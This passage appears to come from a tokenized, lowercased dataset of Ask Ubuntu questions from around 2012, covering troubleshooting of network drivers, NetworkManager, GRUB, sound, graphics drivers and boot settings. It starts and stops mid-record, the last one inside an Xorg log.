follow : -- dmesg is showing a very abnormal logs , like ubuntu is automatically bringing the eth0 up , where eth0 is getting also auto down . [ 2025.897511 ] r8169 0000:02:00.0 : eth0 : link up [ 2029.347649 ] r8169 0000:02:00.0 : eth0 : link up [ 2030.775556 ] r8169 0000:02:00.0 : eth0 : link up [ 2038.242203 ] r8169 0000:02:00.0 : eth0 : link up [ 2057.267801 ] r8169 0000:02:00.0 : eth0 : link up [ 2062.871770 ] r8169 0000:02:00.0 : eth0 : link up [ 2082.479712 ] r8169 0000:02:00.0 : eth0 : link up [ 2285.630797 ] r8169 0000:02:00.0 : eth0 : link up [ 2308.417640 ] r8169 0000:02:00.0 : eth0 : link up [ 2480.948290 ] r8169 0000:02:00.0 : eth0 : link up [ 2824.884798 ] r8169 0000:02:00.0 : eth0 : link up [ 3030.022183 ] r8169 0000:02:00.0 : eth0 : link up [ 3306.587353 ] r8169 0000:02:00.0 : eth0 : link up [ 3523.566881 ] r8169 0000:02:00.0 : eth0 : link up [ 3619.839585 ] r8169 0000:02:00.0 : eth0 : link up [ 3682.154393 ] nf_conntrack version 0.5.0 ( 16384 buckets , 65536 max ) [ 3899.866854 ] r8169 0000:02:00.0 : eth0 : link up [ 4723.978269 ] r8169 0000:02:00.0 : eth0 : link up [ 4807.415682 ] r8169 0000:02:00.0 : eth0 : link up [ 5101.865686 ] r8169 0000:02:00.0 : eth0 : link up how do i fix it ? -- http : //ubuntuforums.org/showthread.php ? t=1959794 $ apt-get install openipml openhpi-plugin-ipml $ openipmish > help redisp_cmd on|off > redisp_cmd on redisp set final follow up : step 1 : bug for network card driver r8169 step 2 : get the latest build version http : //www.realtek.com/downloads/downloadsview.aspx ? langid=1 & pnid=4 & pfid=4 & level=5 & conn=4 & downtypeid=3 & getdown=false & downloads=true # rtl8110sc ( l ) step 3 : build / make $ cd /var/tmp/driver $ tar xvfj r8169.tar.bz2 $ make clean modules & & make install $ rmmod r8169 $ depmod $ cp src/r8169.ko /lib/modules/3.xxxx/kernel/drivers/net/r8169.ko $ modprobe r8169 $ update-initramfs -u $ init 6 voila ! !
148057	nm-applet missing after installing ubuntu under virtualbox	after installing ubuntu under virtualbox the nm-applet is missing . i already tried to restart the applet but nothing has happened . any suggestions ? $ kill nm-applet bash : kill : nm-applet : arguments must be process or job ids $ kill 2649 $ sudo nm-applet ** ( nm-applet:2740 ) : warning ** : could not initialize nmclient /org/freedesktop/networkmanager : the name org.freedesktop.networkmanager was not provided by any .service files ** message : applet now removed from the notification area ** ( nm-applet:2740 ) : warning ** : failed to register as an agent : ( 2 ) the name org.freedesktop.networkmanager was not provided by any .service files ** message : using fallback from indicator to gtkstatusicon ( nm-applet:2740 ) : gdkpixbuf-critical ** : gdk_pixbuf_scale_simple : assertion `dest_width > 0 ' failed ** message : starting applet secret agent because gnome shell disappeared ** ( nm-applet:2740 ) : warning ** : failed to register as an agent : ( 2 ) the name org.freedesktop.networkmanager was not provided by any .service files thanks for the suggestions . i already removed the network-manager and network-manager-gnome packages and reinstalled . additionally i installed the package network-manager-dpg but the terminal apparently does n't know the package network-manager . synaptic tells me that both network-manager and network-manager-gnome are installed correctly . there 's just a problem with network-manager-dbg which i successfully reinstalled using the terminal but the error is still there . i ca n't upgrade the broken package via internet since the connection does n't work without the network-manager . $ sudo dpkg -i ~/downloads/network-manager-dbg_0.9.4.0-0ubuntu3_amd64.deb ( reading database ... 197394 files and directories currently installed . ) preparing to replace network-manager-dbg 0.9.4.0-0ubuntu3 ( using ... /network-manager-dbg_0.9.4.0-0ubuntu3_amd64.deb ) ... unpacking replacement network-manager-dbg ... setting up network-manager-dbg ( 0.9.4.0-0ubuntu3 ) ... $ sudo service network-manager start network-manager : unrecognized service $ > $ sudo service network-manager start [ sudo ] password for jonas : network-manager start/running , process 2471 $ nm-applet ** ( nm-applet:2517 ) : warning ** : could not initialize nmclient /org/freedesktop/networkmanager : the name org.freedesktop.networkmanager was not provided by any .service files ** message : applet now removed from the notification area ** ( nm-applet:2517 ) : warning ** : failed to register as an agent : ( 2 ) the name org.freedesktop.networkmanager was not provided by any .service files ** message : starting applet secret agent because gnome shell disappeared ** ( nm-applet:2517 ) : warning ** : failed to register as an agent : ( 2 ) the name org.freedesktop.networkmanager was not provided by any .service files ^c** message : pid 0 ( we are 2517 ) sent signal 2 , shutting down ... >
148058	will deja dup or any other backup program work with charter cloud drive ?	charter communications offers their own cloud drive backup service for their customers . since it is unlimited disk space , i am considering using it . does deja dup or any other backup solution support this service ? i can not seem to find an answer via google or other search engine . hopefully someone has had experience here .
148062	wireless card driver for dell mini 1012 using ubuntu 12.04 ?	i just installed ubuntu 12.04 on my dell mini 1012 . it seems to be running fine but i am unable to get my wireless card working ? i even plugged in my ethernet cable and could not get an internet connection ? does anyone have any ideas or a how-to ? i ca n't wait to use the new o/s but would like to have internet too ! : - )
148067	how can i disable gnome-panel 's context menu ?	i 'm using ubuntu precise ( 12.04 ) without unity . sudo apt-get -y install gnome-panel logout and login selected [ gnome classic ] . effect is on . so , can i disable gnome-panel 's context menu ? it is appear super-alt-right click to top-panel or bottom-panel . i want fixing my customized menu icons . thanks .
148069	network usage application indicator	i need a application indicator to show what is the current download and upload network speed . it should be written in text in the panel itself . like `` up:0.5 mbps down:1 mbps '' . is there any application indicator to do that or is there an easy way to make one myself ? digvijay
148073	ati radeon mobility 3650 overheats and shuts down computer in xubuntu and not windows . why ?	i have recently installed xubuntu 12.04 alongside windows vista on my acer aspire 6920g laptop . i installed the latest proprietary fglrx drivers for the ati radeon mobility 3650 . in xubuntu i felt significant heat coming from the area in which the graphics card is situated , even when the system is idle . after about 10 minutes of playing quake live the system shut down suddenly . i opened up the laptop and found that the reason for the emergency shut down was most likely the graphics card , as the heat sink was extremely hot . the heat sink for the cpu was n't hot and i vacuumed it recently ( and temperatures are within normal range ) so i have assumed it is n't the cpu . i vacuumed the laptop again and booted into windows . when the system is idle the laptop feels warmish but significantly cooler where the graphics card is situated . after playing ut2004 and quake live for a good while i found that even though the graphics card got warmer , the computer never shut down . has anyone else had this problem and does anyone know why the graphics card overheats in xubuntu and not windows ( if that is indeed the cause ) ? how can i find out what exactly is causing this problem ? is it a power-management issue or graphics drivers issue ? i installed xubuntu to have a less resource intensive system but i might have to go back to windows for fear of overheating and emergency shut downs . additional info : one thing i also noticed was that ut2004 runs with lower frame rate and has to have less demanding graphics settings to run more smoothly in xubuntu . in windows i can have very high graphics settings and it runs very smoothly . so perhaps the route of the problem is the drivers . however , the fan/system-in-general seems much noisier in xubuntu , even when idle , although the cpu usage does n't seem any higher .
148076	problem with grub not being on hard disk	i have just done an install of ubuntu 12.04 on a new pc with no os from a usb but the grub has not installed onto the hard disk but onto flash , how do i correct this ?
148083	why the enter key in a mac keyboard is mapped to level ?	just installing ubuntu for the first time , glad to ditch win 7 . i have a kvm switch and also a mac , hence i 'm using a mac keyboard ( the full size alu one ) main problem is the enter key on the keypad does n't work . i checked the keyboard layout ( set to 'english uk macintosh ' ) ... inspecting the layout the enter key is mapped to something called 'level ' - wtf is 'level ' ? everything else about the keyboard works great ie the âł $ # @ `` are all perfect , volume control works as expected ... why this weird key mapping on the enter key ? more importantly ... how do i change it to work as an enter key ?
148084	/usr/share/zoneinfo when does the system time actually change ?	please correct me if i am wrong here ... . when i change my system clock this changes the file /usr/share/zoneinfo immediately , however , the actual system time does n't change until the next reboot because /etc/localtime then re-reads /usr/share/zoneinfo ? i have seen behaviour similar to the above , whereby /usr/share/zoneinfo/ was accessed but the system time did not change until after the system had rebooted
148088	black screen after suspend-after moving to the nvidia official drivers ( not priority )	so , when i used the priority drivers , the suspend worked normal . but the official drivers works better , so i installed the official driver . then suspend wo n't work . should i change any text/documants to make it work ? any solution will be aprreciated , thanks you all !
148095	how do i set the grub timeout and the grub default boot entry ?	in ubuntu 12.04 , how do i set the grub time and the default os ( that i see at boot time ) as i 'm dual-booting windows 7 and ubuntu 12.04 ?
148099	how to make ppa build for particular release	i 'm creating my first proper ppa to patch a problem with compiz . debbuild/dput works fine but launchpad tells me it 's only building it for quantal . i 've no interest in doing that for the minute - i 'd like it to build for precise . what do i need to do to get this done ? edit : i went into the package page in launchpad and managed to copy the package i uploaded for another release , but is there a way of setting the default release ( s ) for a ppa ?
148100	is there any simple way to access installed programs ?	just installed ubuntu for the first time ... is there any simple way to browse installed programs ? on mac there is the applications top-level folder ... here i see desktop , documents , downloads etc but no apps ? that 'd be a good idea , no ? ( is there some way to create this myself ? ) on windows there is the start menu ... here it seems like i have to click the 'dash home ' and then i can see 'recent apps ' ... i can search for them ( i 'd rather not ) ... or i can click the ruler/pencil icon at the bottom and see 'recent apps ' and click to expand 'installed apps ' ... ok that 's all of them - is it possible to get a straight list view instead of the hard-to-scan wrapped rows ? also , is there any way to get rid of the pointless random selection of 'apps available for download ' at the bottom ?
148102	problem after installion of nod32 on xubuntu 12.04	after installing the program nod32 antivirus i took this error every time i open console . error : ld.so : object 'libesets_pac.so ' from /etc/ld.so.preload can not be preloaded : ignored . i use x ubuntu 12.04 any solution of this problem ?
148104	modified suspend mode for ubuntu	is it possible to put ubuntu ( 12.04 ) into a 'modified suspend ' mode which basically works like the regular suspend , but allows me to run my vlc for streaming video through the network , while i am away from home/overnight ? i would like to minimize power consumption to absolute minimum during these periods , while maintaining this specific functionality .
148113	no sound from headphones on samsung series 7 chronos ( np700z5a )	i know it 's an old question , but i 've gone through the faqs on ubuntu.com and ca n't find the solution . speakers work fine - ie if i go to system settings > sound , the tests sound . as soon as i plug in my headphones , it goes dead . some diagnostics : duncan @ pliny : ~ $ lspci -v | grep -a7 -i `` audio '' 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 04 ) subsystem : samsung electronics co ltd device c0b3 flags : bus master , fast devsel , latency 0 , irq 29 memory at c0800000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel and also duncan @ pliny : ~ $ sudo aplay -l **** list of playback hardware devices **** home directory /home/duncan not ours . card 0 : pch [ hda intel pch ] , device 0 : alc269vc analog [ alc269vc analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 and my alsamixer : headphones plugged in : headphones unplugged : thanks edit it seems there is sound from headphones - it 's just unbelieveably faint ...
148114	easy , terminal controllable media player	i want a media player that can be started and controllable from both gui and ( intended remote ) commandline . i heard about mpd , but i want something more closer to a regular media player in terms of ui .
148116	fn keys and card reader not working in asus k55	i am using ubuntu 12.04 in my new asus k55 ( intel速 chief river chipset hm76 ) . it works pretty well but the sd card reader is not recognized , and the fn keyboard keys are not working . i have followed this link but it does not help . can you help me ? thanks . here is the lspci output ( for the not recognized card reader ) : lspci 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation ivy bridge pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation panther point pci express root port 2 ( rev c4 ) 00:1c.3 pci bridge : intel corporation panther point pci express root port 4 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation device 1058 ( rev ff ) 03:00.0 network controller : atheros communications inc. ar9485 wireless network adapter ( rev 01 ) 04:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5289 ( rev 01 ) 04:00.2 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 0a )
148118	extra ( unknown ) files in ubuntu one	in my u1 folder there are two files i did n't place there and do n't know what they for . the first is a manifest.xml file - which looks really important , as if it has my entire u1 manifest in . is this true or can i delete it . the second is a file entitled o , within which there are countless files from 0 to 53 and growing . within them they seem to have files marks at notes . for both please see attached pics what are these files for , are they from something i did or do they serve a purpose for u1 ?
148123	how can i make lock screen be like the login screen ?	is it possible to have the login screen displayed when locked instead of that ugly and horrible current lock display , which is the square box in the middle of the screen . apparently ubuntu 12.10 may have this feature , this has given me some hope that maybe their is a package already made or even a script that can achieve this .
148125	no internet connection after update 12.04	i updated 12.04 and then not able to connect to internet via firefox or thunderbird email . it is a wired connection . ifconfig output : eth0 link encap : ethernet hwaddr 54 : e6 : fc:85:0b:63 inet6 addr : fe80 : :56e6 : fcff : fe85 : b63/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:32 errors:0 dropped:0 overruns:0 frame:0 tx packets:28 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:4713 ( 4.7 kb ) tx bytes:5004 ( 5.0 kb ) interrupt:19 base address:0xc00 eth1 link encap : ethernet hwaddr 00:25:22 : a4:69:33 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:43 base address:0xe000 eth1 : avahi link encap : ethernet hwaddr 00:25:22 : a4:69:33 inet addr:169.254.5.249 bcast:169.254.255.255 mask:255.255.0.0 up broadcast multicast mtu:1500 metric:1 interrupt:43 base address:0xe000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:13074 errors:0 dropped:0 overruns:0 frame:0 tx packets:13074 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1059344 ( 1.0 mb ) tx bytes:1059344 ( 1.0 mb ) and lspci : 00:00.0 ram memory : nvidia corporation mcp61 host bridge ( rev a1 ) 00:01.0 isa bridge : nvidia corporation mcp61 lpc bridge ( rev a2 ) 00:01.1 smbus : nvidia corporation mcp61 smbus ( rev a2 ) 00:01.2 ram memory : nvidia corporation mcp61 memory controller ( rev a2 ) 00:02.0 usb controller : nvidia corporation mcp61 usb 1.1 controller ( rev a3 ) 00:02.1 usb controller : nvidia corporation mcp61 usb 2.0 controller ( rev a3 ) 00:04.0 pci bridge : nvidia corporation mcp61 pci bridge ( rev a1 ) 00:05.0 audio device : nvidia corporation mcp61 high definition audio ( rev a2 ) 00:06.0 ide interface : nvidia corporation mcp61 ide ( rev a2 ) 00:07.0 bridge : nvidia corporation mcp61 ethernet ( rev a2 ) 00:08.0 ide interface : nvidia corporation mcp61 sata controller ( rev a2 ) 00:08.1 ide interface : nvidia corporation mcp61 sata controller ( rev a2 ) 00:09.0 pci bridge : nvidia corporation mcp61 pci express bridge ( rev a2 ) 00:0b.0 pci bridge : nvidia corporation mcp61 pci express bridge ( rev a2 ) 00:0c.0 pci bridge : nvidia corporation mcp61 pci express bridge ( rev a2 ) 00:0d.0 vga compatible controller : nvidia corporation c61 [ geforce 7025 / nforce 630a ] ( rev a2 ) 00:18.0 host bridge : advanced micro devices [ amd ] family 10h processor hypertransport configuration 00:18.1 host bridge : advanced micro devices [ amd ] family 10h processor address map 00:18.2 host bridge : advanced micro devices [ amd ] family 10h processor dram controller 00:18.3 host bridge : advanced micro devices [ amd ] family 10h processor miscellaneous control 00:18.4 host bridge : advanced micro devices [ amd ] family 10h processor link control 01:08.0 ethernet controller : realtek semiconductor co. , ltd. rtl-8169 gigabit ethernet ( rev 10 ) bill @ bill-desktop : ~ $
148133	how can i shutdown , restart , log out using hud ?	is it possible to add session command such as shutdown , restart , log out using hud or taking advantage of hud ? i 'm waiting for meaningful answers .
148135	how can i put some separators between unity launcher icons ?	i really need to put some separator in the unity launcher left bar ... i think that could be possible to add some links to a program that simply do nothing so we only need to change it 's icon to a separator-like icon ... how can i do this ?
148140	will the 'smurf effect ' be solved by pepperflash ?	i 've got a 64 bit ubuntu 12.04 install with an nvidia graphics card . for the time being i have disabled hardware acceleration to work around the 'smurf effect ' [ blue faces in videos etc ] . thinking of the future , is there a reasonable expectation that the 'smurf effect ' will be resolved using chrome and pepperflash ? cheers !
148143	deactivated my systemadministrator whil i was loged in as standard-user so i ca n't reactivate it because of the deactivated administrator-password	( my distribution is ubuntu 12.04 ) because of the advice to deactivate the root-user in reasons for safty etc . i did it , while i was logged in as standard-user . now , after i did it apperas me quite unsmart , but unfortunaly it is to late . the problem is , that its not possible for me to install or remove any software or things like that ( or reactivate my admin-konto ) , because always i try to do that ubuntu orders a legitimation , which is the admin-pw , which i deactivated . if i try to reactivate the admin-user or its password in the terminal ( sudo passwd root ) it asks me for my standard-user-password , but when entered , it shows me the message that my standard-user is not in the sudoers file . so i dont know any other option to get my root-rights back . im even not sure if my standard-user is allowed to copy my files onto an extern medium to safe them . please excuse my english , i hope i was able to describe my problem in a proper way , allthoug . i hope that anyone finds some time to make some thoughts about my problem and would be so kind to help me . best regards , butcher
148144	configure mounting timeout at boot	on remotely rebooting a 12.04 machine i found it hanging at the `` unable to mount soandso : skip , manual abort ? `` ( that 's pretty much how i remember the message ) the machine was basically stopped there until i hooked up a keyboard and pressed `` s '' . i can see the rationale for the question , but i 'd really like to know where to configure it or turn it off altogether . a mandatory question like this makes sense in a desktop environment but for servers i 'd like more flexibility . so where do i fiddle and tweak this ?
148145	ubuntu 12.04 opencl with intel and radeon ?	i want to setup my ubuntu 12.04 with opencl ( open computing language ) support for i7 2600k and radeon hd5870 . my monitor is connected to the integrated graphics of the i7 . intel opencl sdk is installed and working . iteration of avaliable opencl devices shows 2 entries for intel . as recommended i installed amd app sdk 2.6 first and then the fglrx driver . i installed fglrx from ubuntu repositories . this works fine till here . when i run aticonfig -- inital -f and restart the system i get into trouble . xorg starts only in low-graphics mode . cat /var/log/xorg.0.log [ 21.201 ] x.org x server 1.12.2 release date : 2012-05-29 [ 21.201 ] x protocol version 11 , revision 0 [ 21.201 ] build operating system : linux 2.6.24-29-xen x86_64 ubuntu [ 21.201 ] current operating system : linux chimera 3.2.0-24-generic # 39-ubuntu smp mon may 21 16:52:17 utc 2012 x86_ [ 21.201 ] kernel command line : boot_image=/boot/vmlinuz-3.2.0-24-generic root=uuid=c137757b-486b-4514-9dfe-00c97662 [ 21.201 ] build date : 05 june 2012 08:35:55am [ 21.201 ] xorg-server 2:1.12.2+git20120605+server-1.12-branch.aaf48906-0ubuntu0ricotz~precise ( for technical suppor [ 21.201 ] current version of pixman : 0.26.0 [ 21.201 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 21.201 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 21.201 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : fri jun 8 14:22:36 2012 [ 21.247 ] ( == ) using config file : `` /etc/x11/xorg.conf '' [ 21.247 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 21.450 ] ( == ) serverlayout `` aticonfig layout '' [ 21.450 ] ( ** ) | -- > screen `` aticonfig-screen [ 0 ] -0 '' ( 0 ) [ 21.450 ] ( ** ) | | -- > monitor `` aticonfig-monitor [ 0 ] -0 '' [ 21.451 ] ( ** ) | | -- > device `` aticonfig-device [ 0 ] -0 '' [ 21.451 ] ( == ) automatically adding devices [ 21.451 ] ( == ) automatically enabling devices [ 21.466 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 21.466 ] entry deleted from font path . [ 21.466 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 21.466 ] entry deleted from font path . [ 21.466 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 21.466 ] entry deleted from font path . [ 21.473 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 21.473 ] entry deleted from font path . [ 21.473 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 21.473 ] entry deleted from font path . [ 21.473 ] ( ww ) the directory `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' does not exist . [ 21.473 ] entry deleted from font path . [ 21.473 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins [ 21.473 ] ( == ) modulepath set to `` /usr/lib/x86_64-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib [ 21.473 ] ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . [ 21.473 ] ( ii ) loader magic : 0x7f0ad3b9ab00 [ 21.473 ] ( ii ) module abi versions : [ 21.473 ] x.org ansi c emulation : 0.4 [ 21.473 ] x.org video driver : 12.0 [ 21.473 ] x.org xinput driver : 16.0 [ 21.473 ] x.org server extension : 6.0 [ 21.473 ] ( -- ) pci : * ( 0:0:2:0 ) 8086:0122:1458 : d000 rev 9 , mem @ 0xfb800000/4194304 , 0xe0000000/268435456 , i/o @ 0x00 [ 21.473 ] ( -- ) pci : ( 0:1:0:0 ) 1002:6898:1787:2289 rev 0 , mem @ 0xd0000000/268435456 , 0xfbdc0000/131072 , i/o @ 0x000 [ 21.473 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 21.473 ] ( ii ) `` extmod '' will be loaded by default . [ 21.473 ] ( ii ) `` dbe '' will be loaded by default . [ 21.473 ] ( ii ) `` glx '' will be loaded . this was enabled by default and also specified in the config file . [ 21.473 ] ( ii ) `` record '' will be loaded by default . [ 21.473 ] ( ii ) `` dri '' will be loaded by default . [ 21.473 ] ( ii ) `` dri2 '' will be loaded by default . [ 21.473 ] ( ii ) loadmodule : `` glx '' [ 21.732 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/extra-modules.dpkg-tmp/modules/extensions/libgl [ 21.934 ] ( ii ) module glx : vendor= '' advanced micro devices , inc. '' [ 21.934 ] compiled for 6.9.0 , module version = 1.0.0 [ 21.934 ] ( ii ) loading extension glx [ 21.934 ] ( ii ) loadmodule : `` extmod '' [ 22.028 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libextmod.so [ 22.041 ] ( ii ) module extmod : vendor= '' x.org foundation '' [ 22.041 ] compiled for 1.12.2 , module version = 1.0.0 [ 22.041 ] module class : x.org server extension [ 22.041 ] abi class : x.org server extension , version 6.0 [ 22.041 ] ( ii ) loading extension mit-screen-saver [ 22.041 ] ( ii ) loading extension xfree86-vidmodeextension [ 22.041 ] ( ii ) loading extension xfree86-dga [ 22.041 ] ( ii ) loading extension dpms [ 22.041 ] ( ii ) loading extension xvideo [ 22.041 ] ( ii ) loading extension xvideo-motioncompensation [ 22.041 ] ( ii ) loading extension x-resource [ 22.041 ] ( ii ) loadmodule : `` dbe '' [ 22.041 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdbe.so [ 22.066 ] ( ii ) module dbe : vendor= '' x.org foundation '' [ 22.066 ] compiled for 1.12.2 , module version = 1.0.0 [ 22.066 ] module class : x.org server extension [ 22.066 ] abi class : x.org server extension , version 6.0 [ 22.066 ] ( ii ) loading extension double-buffer [ 22.066 ] ( ii ) loadmodule : `` record '' [ 22.066 ] ( ii ) loading /usr/lib/xorg/modules/extensions/librecord.so [ 22.077 ] ( ii ) module record : vendor= '' x.org foundation '' [ 22.077 ] compiled for 1.12.2 , module version = 1.13.0 [ 22.077 ] module class : x.org server extension [ 22.077 ] abi class : x.org server extension , version 6.0 [ 22.077 ] ( ii ) loading extension record [ 22.077 ] ( ii ) loadmodule : `` dri '' [ 22.077 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri.so [ 22.082 ] ( ii ) module dri : vendor= '' x.org foundation '' [ 22.082 ] compiled for 1.12.2 , module version = 1.0.0 [ 22.082 ] abi class : x.org server extension , version 6.0 [ 22.082 ] ( ii ) loading extension xfree86-dri [ 22.082 ] ( ii ) loadmodule : `` dri2 '' [ 22.082 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri2.so [ 22.083 ] ( ii ) module dri2 : vendor= '' x.org foundation '' [ 22.083 ] compiled for 1.12.2 , module version = 1.2.0 [ 22.083 ] abi class : x.org server extension , version 6.0 [ 22.083 ] ( ii ) loading extension dri2 [ 22.083 ] ( ii ) loadmodule : `` fglrx '' [ 22.083 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/extra-modules.dpkg-tmp/modules/drivers/fglrx_dr [ 22.399 ] ( ii ) module fglrx : vendor= '' firegl - ati technologies inc. '' [ 22.399 ] compiled for 1.4.99.906 , module version = 8.96.4 [ 22.399 ] module class : x.org video driver [ 22.399 ] ( ii ) loading sub module `` fglrxdrm '' [ 22.399 ] ( ii ) loadmodule : `` fglrxdrm '' [ 22.399 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/extra-modules.dpkg-tmp/modules/linux/libfglrxdr [ 22.445 ] ( ii ) module fglrxdrm : vendor= '' firegl - ati technologies inc. '' [ 22.445 ] compiled for 1.4.99.906 , module version = 8.96.4 [ 22.445 ] ( ii ) ati proprietary linux driver version identifier:8.96.4 [ 22.445 ] ( ii ) ati proprietary linux driver release identifier : 8.96.7 [ 22.445 ] ( ii ) ati proprietary linux driver build date : mar 12 2012 13:06:50 [ 22.445 ] ( ++ ) using vt number 7 [ 22.445 ] ( ww ) falling back to old probe method for fglrx [ 23.043 ] ( ii ) loading pcs database from /etc/ati/amdpcsdb [ 23.082 ] ( -- ) chipset supported amd graphics processor ( 0x6898 ) found [ 23.107 ] ( ww ) fglrx : no matching device section for instance ( busid pci:0 @ 1:0:1 ) found [ 23.107 ] ( ii ) fglrx : intel vga device detected , load intel driver . [ 23.107 ] ( ii ) loadmodule : `` intel '' [ 23.211 ] ( ii ) loading /usr/lib/xorg/modules/drivers/intel_drv.so [ 23.475 ] ( ii ) module intel : vendor= '' x.org foundation '' [ 23.475 ] compiled for 1.12.2 , module version = 2.19.0 [ 23.475 ] module class : x.org video driver [ 23.475 ] abi class : x.org video driver , version 12.0 [ 23.476 ] ukidynamicmajor : found major device number 249 [ 23.476 ] ukidynamicmajor : found major device number 249 [ 23.476 ] ukiopenbybusid : searching for busid pci:1:0:0 [ 23.476 ] ukiopendevice : node name is /dev/ati/card0 [ 23.476 ] ukiopendevice : open result is 8 , ( ok ) [ 23.476 ] ukiopenbybusid : ukiopenminor returns 8 [ 23.476 ] ukiopenbybusid : ukigetbusid reports pci:1:0:0 [ 23.540 ] ( ww ) powerxpress feature is not supported [ 23.540 ] ( ee ) no devices detected . [ 23.540 ] ( == ) matched intel as autoconfigured driver 0 [ 23.540 ] ( == ) matched vesa as autoconfigured driver 1 [ 23.540 ] ( == ) matched fbdev as autoconfigured driver 2 [ 23.540 ] ( == ) assigned the driver to the xf86configlayout [ 23.540 ] ( ii ) loadmodule : `` intel '' [ 23.540 ] ( ii ) loading /usr/lib/xorg/modules/drivers/intel_drv.so [ 23.540 ] ( ii ) module intel : vendor= '' x.org foundation '' [ 23.540 ] compiled for 1.12.2 , module version = 2.19.0 [ 23.540 ] module class : x.org video driver [ 23.540 ] abi class : x.org video driver , version 12.0 [ 23.540 ] ( ii ) unloadmodule : `` intel '' [ 23.540 ] ( ii ) unloading intel [ 23.540 ] ( ii ) failed to load module `` intel '' ( already loaded , 32522 ) [ 23.540 ] ( ii ) loadmodule : `` vesa '' [ 23.583 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 23.620 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 23.620 ] compiled for 1.12.2 , module version = 2.3.1 [ 23.620 ] module class : x.org video driver [ 23.620 ] abi class : x.org video driver , version 12.0 [ 23.620 ] ( ii ) loadmodule : `` fbdev '' [ 23.620 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 23.661 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 23.661 ] compiled for 1.12.2 , module version = 0.4.2 [ 23.661 ] module class : x.org video driver [ 23.661 ] abi class : x.org video driver , version 12.0 [ 23.661 ] ( ii ) ati proprietary linux driver version identifier:8.96.4 [ 23.661 ] ( ii ) ati proprietary linux driver release identifier : 8.96.7 [ 23.661 ] ( ii ) ati proprietary linux driver build date : mar 12 2012 13:06:50 [ 23.661 ] ( ii ) intel : driver for intel integrated graphics chipsets : i810 , i810-dc100 , i810e , i815 , i830m , 845g , 854 , 852gm/855gm , 865g , 915g , e7221 ( i915 ) , 915gm , 945g , 945gm , 945gme , pineview gm , pineview g , 965g , g35 , 965q , 946gz , 965gm , 965gme/gle , g33 , q35 , q33 , gm45 , 4 series , g45/g43 , q45/q43 , g41 , b43 , b43 , clarkdale , arrandale , sandybridge desktop ( gt1 ) , sandybridge desktop ( gt2 ) , sandybridge desktop ( gt2+ ) , sandybridge mobile ( gt1 ) , sandybridge mobile ( gt2 ) , sandybridge mobile ( gt2+ ) , sandybridge server , ivybridge mobile ( gt1 ) , ivybridge mobile ( gt2 ) , ivybridge desktop ( gt1 ) , ivybridge desktop ( gt2 ) , ivybridge server , ivybridge server ( gt2 ) [ 23.661 ] ( ii ) vesa : 